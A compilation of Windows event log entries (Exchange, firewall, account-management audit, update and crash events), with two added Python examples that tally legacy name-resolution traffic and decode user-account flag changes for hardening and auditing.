Event ID:
Source:
powershell
Category:
Engine Lifecycle
Message:
Stopped
Available
NewEngineState=Stopped PreviousEngineState=Available SequenceNumber=15 HostName=ConsoleHost HostVersion=5.1.22598.1 HostId=46dc6910-488c-4202-a87a-de50e5ed56c4 HostApplication=powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1'; EngineVersion=5.1.22598.1 RunspaceId=c9ce49c6-29b1-4d28-85df-b7c49d562b06 PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine=



Event ID:
Source:
MSExchange OAuth
Message:
Unable to find the certificate with thumbprint 6A80C06C7E33AC535F671B3366355547C35D044B in the current computer or the certificate is missing private key. The certificate is needed to sign the outgoing token.


Event ID:
Source:
MSExchangeRepl
Category:
Service
Message:
Active Manager failed to mount database Public Folder Database 1 on server MailServer1.arabia.sy. Error: An Active Manager operation failed. Error The database action failed. Error: Unable to mount database 'Public Folder Database 1'. The database appears to have been mounted at least once since its creation, but there is no database file at 'D:\Exchange 2010\Mailbox Database\Public Folder Database\Public Folder Database.edb'. Either recover the database file from a backup, or mount the database with a new, empty database by using the Mount-Database cmdlet with the -Force parameter..


Event ID:
Source:
Microsoft Windows security auditing.
Message:
The Windows Filtering Platform has permitted a connection.

Application Information:
Process ID: 4320
Application Name: \device\harddiskvolume2\windows\system32\svchost.exe

Network Information:
Direction: Inbound
Source Address: 224.0.0.252
Source Port: 5355
Destination Address: 167.196.121.75
Destination Port: 60070
Protocol: 17

Filter Information:
Filter Run-Time ID: 83103
Layer Name: Receive/Accept
Layer Run-Time ID: 44
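
Event 5156 above records an inbound UDP datagram on port 5355, i.e. LLMNR, accepted by svchost.exe. LLMNR and NetBIOS name resolution trust whichever host answers first on the segment, which is what LLMNR/NBNS poisoning relies on, so an inventory of which processes still exchange that traffic is the evidence to gather before turning multicast name resolution off by policy. The Python below is an added example, not from the original page or EventSentry: it parses the sectioned "Field: Value" layout of 5156 into a dict per section and tallies LLMNR, NBNS and mDNS flows per process. The sample records are constructed from a template; the first copies the entry above, the others are assumed additional flows.

```python
import re
from collections import Counter

# Template matching the 5156 layout above; used only to build constructed samples.
TEMPLATE = """The Windows Filtering Platform has permitted a connection.

Application Information:
Process ID: {pid}
Application Name: {app}

Network Information:
Direction: {direction}
Source Address: {src}
Source Port: {sport}
Destination Address: {dst}
Destination Port: {dport}
Protocol: {proto}

Filter Information:
Filter Run-Time ID: {fid}
Layer Name: {layer}
Layer Run-Time ID: {lid}"""

SAMPLE_5156 = [TEMPLATE.format(**f) for f in (
    # copy of the entry above: LLMNR accepted by svchost.exe
    dict(pid=4320, app=r"\device\harddiskvolume2\windows\system32\svchost.exe", direction="Inbound",
         src="224.0.0.252", sport=5355, dst="167.196.121.75", dport=60070, proto=17,
         fid=83103, layer="Receive/Accept", lid=44),
    # assumed: NetBIOS name service broadcast from the kernel (System)
    dict(pid=4, app="System", direction="Outbound", src="10.0.0.12", sport=137,
         dst="10.0.0.255", dport=137, proto=17, fid=67001, layer="Connect", lid=48),
    # assumed: mDNS multicast received by svchost.exe
    dict(pid=2212, app=r"\device\harddiskvolume2\windows\system32\svchost.exe", direction="Inbound",
         src="10.0.0.31", sport=5353, dst="224.0.0.251", dport=5353, proto=17,
         fid=83110, layer="Receive/Accept", lid=44),
    # assumed: ordinary HTTPS, should not be counted
    dict(pid=7712, app=r"\device\harddiskvolume2\program files\google\chrome\application\chrome.exe",
         direction="Outbound", src="10.0.0.12", sport=51000, dst="93.184.216.34", dport=443,
         proto=6, fid=67002, layer="Connect", lid=48),
)]

# "Key: value" or a bare "Section:" header; the key stops at the first colon so
# IPv6 addresses in the value are not split.
LINE_RE = re.compile(r"^\s*([A-Za-z][A-Za-z /-]*?):\s*(.*?)\s*$")

# Name-resolution protocols that answer to anyone on the segment (assumed map).
BROADCAST_NAME_PORTS = {5355: "LLMNR", 137: "NBNS", 5353: "mDNS"}


def parse_5156(message):
    """Flatten a 5156 message into {section: {field: value}}."""
    sections, current = {}, None
    for line in message.splitlines()[1:]:      # skip the summary sentence
        m = LINE_RE.match(line)
        if not line.strip() or not m:
            continue
        key, value = m.groups()
        if value == "":                        # a section header such as "Network Information:"
            current = key
            sections[current] = {}
        elif current is not None:
            sections[current][key] = value
    return sections


def classify(sections):
    """Protocol label if either endpoint is a legacy name-resolution port over UDP."""
    net = sections.get("Network Information", {})
    if int(net.get("Protocol", "0")) != 17:
        return None
    ports = {int(net.get("Source Port", "0")), int(net.get("Destination Port", "0"))}
    for port, name in BROADCAST_NAME_PORTS.items():
        if port in ports:
            return name
    return None


def name_resolution_exposure(messages):
    """Count legacy name-resolution flows per (protocol, image name)."""
    counts = Counter()
    for msg in messages:
        sections = parse_5156(msg)
        label = classify(sections)
        if label:
            app = sections.get("Application Information", {}).get("Application Name", "?")
            counts[(label, app.rsplit("\\", 1)[-1])] += 1
    return counts


if __name__ == "__main__":
    for (proto, image), n in sorted(name_resolution_exposure(SAMPLE_5156).items()):
        print(f"{proto:6} {image:12} {n}")
```

5156 is only emitted when "Filtering Platform Connection" success auditing is enabled, and it is extremely noisy; run this kind of tally over a short capture window rather than leaving the audit on. Once the tally is empty apart from svchost.exe, LLMNR can be disabled through the "Turn off multicast name resolution" policy (EnableMulticast under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient) and NetBIOS over TCP/IP per adapter.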


Event ID:
Source:
Service Control Manager
Category:
None
Message:
A timeout (30000 milliseconds) was reached while waiting for a transaction response from the AudioEndpointBuilder service.


Event ID:
Source:
BTHUSB
Category:
None
Message:
The local adapter does not support an important Low Energy controller state to support peripheral mode. The minimum required supported state mask is 0x2491f7fffff, got 0x1fffffff. Low Energy peripheral role functionality will not be available.


Event ID:
Source:
Python Service
Message:
The description for Event ID 255 from source Python Service cannot be found. Either the component that raises this event is not installed on your local computer or the installation is corrupted. You can install or repair the component on the local computer.

If the event originated on another computer, the display information had to be saved with the event.

The following information was included with the event:

Exception : (1058, 'StartService', 'The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.')

The message resource is present but the message was not found in the message table


Event ID:
Source:
PRIVMAN
Category:
None
Message:
BeyondInsight ProcessEvent returned the following error: <Return><Status>Error</Status><Details>UNEXPECTED EXCEPTION: There was no endpoint listening at https://[redacted] that could accept the message. This is often caused by an incorrect address or SOAP action. See InnerException, if present, for more details.</Details></Return>.


Event ID:
Source:
kernel-eventtracing
Category:
session
Message:
Session "ETW USB tracing" failed to start with the following error: 0xC0000022


Event ID:
Source:
Microsoft Windows security
Category:
User Account Management
Message:
A user account was created.


Event ID:
Source:
WindowsUpdateClient
Category:
Windows Update Agent
Message:
Windows Update failed to check for updates with error 0x80072EE2


Event ID:
Source:
McLogEvent
Category:
None
Message:
The update failed; see event log



Event ID:
Source:
WindowsUpdateClient
Category:
Windows Update Agent
Message:
Installation Failure: Windows failed to install the following update with error 0x80004002: 2022-03 Security Only Quality Update for Windows Server 2008 R2 for x64-based Systems (KB5011529).


Event ID:
Source:
ThreadLib
Category:
None
Message:
The description for Event ID ( 0 ) in Source ( ThreadLib ) cannot be found. The local computer may not have the necessary registry information or message DLL files to display messages from a remote computer. You may be able to use the /AUXSOURCE= flag to retrieve this description; see Help and Support for details. The following information is part of the event: ThreadLib::Thread Exception::ThumbFetcherThreadFunc.


Event ID:
Source:
ESENT
Category:
(1)
Message:
StartMenuExperienceHost (6836,P,98) TILEREPOSITORYS-1-5-21-3400871313-2007772415-2983089221-1001: An attempt to open the device with name "\\.\C:" containing "C:\" failed with system error 5 (0x00000005): "Access is denied.". The operation will fail with error -1032 (0xfffffbf8).


Event ID:
Source:
EventSentry
Category:
Service Monitoring
Message:
The status for driver wdboot (Windows Defender Boot Driver) remains Stopped.

Additional Driver Information:

Startup type: Automatic
Executable: \SystemRoot\system32\drivers\wd\WdBoot.sys


Event ID:
Source:
DeviceManagement-Enterprise-Diagnostics-Provider
Message:
MDM ConfigurationManager: Command failure status. Configuration Source ID: (LA 7F004E2-A009-41B4-AC78-69BCCA464D09}), Enrollment Type: (FamilySafety), CSP Name: (AppLocker), Command Type: (Clear: first phase of Delete), CSP URI: (/Vendor/MSFT/AppLocker/FamilySafety/FamilySafetyGroup), Result: (UnknownWin32Error code: 0x86000002).


Event ID:
Source:
Application
Message:
Faulting application name: BackgroundTaskHost.exe, version: 10.0.20348.1, time stamp: 0xdf4b0fee
Faulting module name: twinapi.appcore.dll, version: 10.0.20348.1129, time stamp: 0x5b888f7b
Exception code: 0xc0000409
Fault offset: 0x00000000000d222b
Faulting process id: 0x144c
Faulting application start time: 0x01d94a82bf78f269
Faulting application path: C:\Windows\system32\BackgroundTaskHost.exe
Faulting module path: C:\Windows\System32\twinapi.appcore.dll
Report Id: ad3e8927-b13c-4133-97a0-a96e03efd1cc
Faulting package full name: Microsoft.AAD.BrokerPlugin_1000.19580.1000.0_neutral_neutral_cw5n1h2txyewy
Faulting package-relative application ID: App


Event ID:
Source:
MSSQLSERVER
Category:
Backup
Message:
BACKUP failed to complete the command BACKUP LOG model. Check the backup application log for detailed messages.


Event ID:
Source:
stornvme
Message:
The driver detected a controller error on \Device\Raidport3.


Event ID:
Source:
Kernel-Power
Category:
268
Message:
The system session has transitioned from 16 to 18.

Reason: 220


Event ID:
Source:
ESENT
Category:
Logging/Recovery
Message:
svchost (9916,R,98) TILEREPOSITORYS-1-5-18: Error -1023 (0xfffffc01) occurred while opening a log file.


Event ID:
Source:
DistributedCOM
Message:
The server {021E4F06-9DCC-49AD-88CF-ECC2DA314C8A} did not register with DCOM within the required timeout.


Event ID:
Source:
Security
Category:
Audit User Account Management
Message:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4738</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13824</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-08-20T16:22:02.792454100Z" />
<EventRecordID>175413</EventRecordID>
<Correlation />
<Execution ProcessID="520" ThreadID="1508" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="Dummy">-</Data>
<Data Name="TargetUserName">ksmith</Data>
<Data Name="TargetDomainName">CONTOSO</Data>
<Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-6609</Data>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x30dc2</Data>
<Data Name="PrivilegeList">-</Data>
<Data Name="SamAccountName">-</Data>
<Data Name="DisplayName">-</Data>
<Data Name="UserPrincipalName">-</Data>
<Data Name="HomeDirectory">-</Data>
<Data Name="HomePath">-</Data>
<Data Name="ScriptPath">-</Data>
<Data Name="ProfilePath">-</Data>
<Data Name="UserWorkstations">-</Data>
<Data Name="PasswordLastSet">-</Data>
<Data Name="AccountExpires">-</Data>
<Data Name="PrimaryGroupId">-</Data>
<Data Name="AllowedToDelegateTo">-</Data>
<Data Name="OldUacValue">0x15</Data>
<Data Name="NewUacValue">0x211</Data>
<Data Name="UserAccountControl">%%2050 %%2089</Data>
<Data Name="UserParameters">-</Data>
<Data Name="SidHistory">-</Data>
<Data Name="LogonHours">-</Data>
</EventData>
</Event>
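
Event 4738 above reports the change as Old/New UAC Value hex numbers (0x15 to 0x211) plus %%-coded strings that only render with the message DLL. Those values use the SAM USER_ACCOUNT flag layout from MS-SAMR (0x1 disabled, 0x4 password not required, 0x10 normal account), not the LDAP userAccountControl bit positions, so decoding them against the wrong table gives nonsense. The Python below is an added example, not from the original page or EventSentry: it reads the EventData of the record above, diffs the two values bit by bit, and marks changes that weaken the account. The XML sample is a trimmed copy of the entry above; the set of flags treated as alert-worthy is an assumption for this example.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Trimmed copy of the 4738 record above (System block shortened, unchanged "-" fields dropped).
SAMPLE_4738_XML = """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4738</EventID>
<Computer>DC01.contoso.local</Computer>
</System>
<EventData>
<Data Name="TargetUserName">ksmith</Data>
<Data Name="TargetDomainName">CONTOSO</Data>
<Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-6609</Data>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x30dc2</Data>
<Data Name="OldUacValue">0x15</Data>
<Data Name="NewUacValue">0x211</Data>
<Data Name="UserAccountControl">%%2050 %%2089</Data>
</EventData>
</Event>"""

# SAM USER_ACCOUNT flags (MS-SAMR 2.2.1.12). 4738 reports Old/New UAC Value in
# this layout, which differs from the LDAP userAccountControl bit layout.
USER_ACCOUNT_FLAGS = {
    0x00000001: "USER_ACCOUNT_DISABLED",
    0x00000002: "USER_HOME_DIRECTORY_REQUIRED",
    0x00000004: "USER_PASSWORD_NOT_REQUIRED",
    0x00000008: "USER_TEMP_DUPLICATE_ACCOUNT",
    0x00000010: "USER_NORMAL_ACCOUNT",
    0x00000020: "USER_MNS_LOGON_ACCOUNT",
    0x00000040: "USER_INTERDOMAIN_TRUST_ACCOUNT",
    0x00000080: "USER_WORKSTATION_TRUST_ACCOUNT",
    0x00000100: "USER_SERVER_TRUST_ACCOUNT",
    0x00000200: "USER_DONT_EXPIRE_PASSWORD",
    0x00000400: "USER_ACCOUNT_AUTO_LOCKED",
    0x00000800: "USER_ENCRYPTED_TEXT_PASSWORD_ALLOWED",
    0x00001000: "USER_SMARTCARD_REQUIRED",
    0x00002000: "USER_TRUSTED_FOR_DELEGATION",
    0x00004000: "USER_NOT_DELEGATED",
    0x00008000: "USER_USE_DES_KEY_ONLY",
    0x00010000: "USER_DONT_REQUIRE_PREAUTH",
    0x00020000: "USER_PASSWORD_EXPIRED",
    0x00040000: "USER_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION",
    0x00080000: "USER_NO_AUTH_DATA_REQUIRED",
    0x00100000: "USER_PARTIAL_SECRETS_ACCOUNT",
    0x00200000: "USER_USE_AES_KEYS",
}

# Flags whose appearance weakens the account; an assumed alert list for this example.
WEAKENING_FLAGS = {
    "USER_PASSWORD_NOT_REQUIRED", "USER_DONT_EXPIRE_PASSWORD", "USER_DONT_REQUIRE_PREAUTH",
    "USER_USE_DES_KEY_ONLY", "USER_TRUSTED_FOR_DELEGATION",
    "USER_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION", "USER_ENCRYPTED_TEXT_PASSWORD_ALLOWED",
}


def decode_flags(value):
    """Flag names set in a USER_ACCOUNT value, lowest bit first; unknown bits kept."""
    names = [name for bit, name in USER_ACCOUNT_FLAGS.items() if value & bit]
    unknown = value & ~sum(USER_ACCOUNT_FLAGS)
    if unknown:
        names.append(f"UNKNOWN_0x{unknown:08X}")
    return names


def uac_delta(old, new):
    """Flags added and removed between two USER_ACCOUNT values."""
    return {"added": decode_flags(new & ~old), "removed": decode_flags(old & ~new)}


def parse_4738(xml_text):
    """Decode a 4738 Event XML into who changed what on which account."""
    root = ET.fromstring(xml_text)
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    old, new = int(data["OldUacValue"], 16), int(data["NewUacValue"], 16)
    delta = uac_delta(old, new)
    return {
        "computer": root.find("e:System/e:Computer", NS).text,
        "subject": f"{data['SubjectDomainName']}\\{data['SubjectUserName']}",
        "target": f"{data['TargetDomainName']}\\{data['TargetUserName']}",
        "old": decode_flags(old),
        "new": decode_flags(new),
        "added": delta["added"],
        "removed": delta["removed"],
        "alert": sorted(set(delta["added"]) & WEAKENING_FLAGS),
    }


if __name__ == "__main__":
    for key, val in parse_4738(SAMPLE_4738_XML).items():
        print(f"{key:9} {val}")
```

For the record above this yields: password-not-required cleared and don't-expire-password set on CONTOSO\ksmith by CONTOSO\dadmin, with the latter flagged. Diffing the hex values is more reliable than matching the rendered strings, which depend on the collector's locale and message DLL.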


Event ID:
Source:
PowerShell
Category:
Task Category (6)
Message:
Provider "Function" is Started.

Details:
ProviderName=Function
NewProviderState=Started

SequenceNumber=9

HostName=ConsoleHost
HostVersion=5.1.19041.2673
HostId=1e6d96ab-43f1-4b85-bd39-3cc54faa962d
HostApplication=powershell.exe -ExecutionPolicy Restricted -Command $Res = 0; $Infs = Get-Item -Path ($env:WinDir + '\inf\*.inf'); foreach ($Inf in $Infs) { $Data = Get-Content $Inf.FullName; if ($Data -match '\[defaultinstall.nt(amd64|arm|arm64|x86)\]') { $Res = 1; break; } } Write-Host 'Final result:', $Res;
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=


Event ID:
Source:
DbxSvc
Message:
CertFindCertificateInStore failed with: (-2146885628) Cannot find object or property.


Event ID:
Source:
TerminalServices-RemoteConnectionManager
Category:
None
Message:
The RD Session Host server received large number of incomplete connections. The system may be under attack.


Event ID:
Source:
Application Error
Message:
Faulting application name: BackgroundTaskHost.exe, version: 10.0.19041.546, time stamp: 0x1d3a15e7
Faulting module name: ntdll.dll, version: 10.0.19041.3155, time stamp: 0x5212ece5
Exception code: 0xc0000374
Fault offset: 0x00000000000ff419
Faulting process id: 0xafb0
Faulting application start time: 0x01d9c3f947c55a40
Faulting application path: C:\WINDOWS\system32\BackgroundTaskHost.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: 29e16c65-2180-4e57-9cf3-14d887083a9e
Faulting package full name: Microsoft.AAD.BrokerPlugin_1000.19041.1023.0_neutral_neutral_cw5n1h2txyewy
Faulting package-relative application ID: App


Event ID:
Source:
Service Control Manager
Message:
The EuGdiDrv Service was not started due to the following error:
The specified path cannot be found.


Event ID:
Source:
schannel
Message:
The following fatal alert was received: 40.



Event ID:
Source:
nhi
Message:
Error code: 0xDC, Sub error code: 0x7C


Event ID:
Source:
Nvidia
Category:
None
Message:
DrvSetContext failed functionality indeterminant(pid=2112 cncmd.ext 64bit)


Event ID:
Source:
Service Control Manager
Category:
None
Message:
The following boot-start or system-start driver(s) did not load:
dam


Event ID:
Source:
BugCheck
Category:
None
Message:
The computer has rebooted from a bugcheck. The bugcheck was: 0x0000003b (0x0000000080000003, 0xfffff8063333dee3, 0xffff8308449f4dd0, 0x0000000000000000). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: c5f3df43-03aa-46e1-8751-ce9800ff3fa9.


Event ID:
Source:
DistributedCOM
Category:
None
Message:
Classic


Event ID:
Source:
ModernDeployment-Diagnostics-Provider
Message:
Autopilot.dll WIL error was reported.
HRESULT: 0x80070491
File: onecoreuap\admin\moderndeployment\autopilot\dll\dllmain.cpp, line 128
Message: NULL


Event ID:
Source:
MIQADS
Message:
Logs status


Event ID:
Source:
Kernel-EventTracing
Category:
Session
Message:
Session "NT Kernel Logger" failed to start with the following error: 0xC0000035


Event ID:
Source:
EvntAgnt
Message:
Error reading log event record. Handle specified is 927269016. Return code from ReadEventLog is 87.


Event ID:
Source:
CertificateServicesClient-CertEnroll
Message:
Certificate enrollment for Local system failed in authentication to policy servers with ID {########-####-####-####-72067EF2E6D9} (The user name or password is incorrect. 0x8007052e (WIN32: 1326 ERROR_LOGON_FAILURE))


Event ID:
Source:
Microsoft Windows security auditing
Message:
LogName=Security
EventCode=4725
EventType=0
ComputerName=domain.domain.local
SourceName=Microsoft Windows security auditing.
Type=Information
RecordNumber=2311231312
Keywords=Audit Success
TaskCategory=User Account Management
OpCode=Info
Message=A user account was disabled.

Subject:
Security ID: S-1-5-21-5232424-4342331231-1232132131-1605
Account Name: domain
Account Domain: local
Logon ID: 0x1dasdwD

Target Account:
Security ID: S-1-5-21-5232424-4342331231-1232132131-1605
Account Name: ws-APP$
Account Domain: local


Event ID:
Source:
Application Error
Message:
Faulting application name: SweetAffection.exe, version: 0.0.0.0, time stamp: 0x6172bb09
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x698c
Faulting application start time: 0x01dac90f4dd836ea
Faulting application path: D:\ganestarts\SweetAffection-0.10.7-pc\SweetAffection.exe
Faulting module path: unknown
Report Id: 44bc9f5f-6f32-47ef-a0e3-4450382e76dd
Faulting package full name:



Event ID:
Source:
Search
Category:
Gatherer
Message:
Error ID 1 happened in Windows Search recovery stage, please restart the service. If this error persists, please recreate the index.

Context: Application, SystemIndex Catalog

Details:
0x%08x (0x80040d23 - The gatherer is shutting down. (HRESULT : 0x80040d23))



Event ID:
Source:
System
Message:
The TCP/IP NetBIOS Helper service was successfully sent a stop control.

The reason specified was: 0x40030011 [Operating System: Network Connectivity (Planned)]

Comment: None




Event ID:
Source:
Application Error
Category:
(100)
Message:
Faulting application name: wuauclt.exe, version: 10.0.17763.3532, time stamp: 0x169653c2
Faulting module name: combase.dll, version: 10.0.17763.5576, time stamp: 0xe64b4fc6
Exception code: 0xc0000005
Fault offset: 0x00000000000588b8
Faulting process id: 0x7c8
Faulting application start time: 0x01db3b3a65732008
Faulting application path: C:\Windows\system32\wuauclt.exe
Faulting module path: C:\Windows\System32\combase.dll
Report Id: 822e0180-614d-4eb0-94c6-0dd5ca2335ac
Faulting package full name:
Faulting package-relative application ID:


Event ID:
Source:
SideBySide
Category:
None
Message:
Generate Activation Context failed for F:\Internet Downloads\McAfee VirusScan CLI Scanner\cls-w32-702-l\scan.exe.Manifest. Reference error message: The operation completed successfully.


Event ID:
Source:
Microsoft-Windows-Directory-Services-SAM
Message:
There is no message in the SIEM logs I'm seeing this from. Fields unique to this Event ID (Kibana Discover):

winlog.event_data.AccountDN
winlog.event_data.AccountSID
winlog.event_data.KeyHash


Found 812 records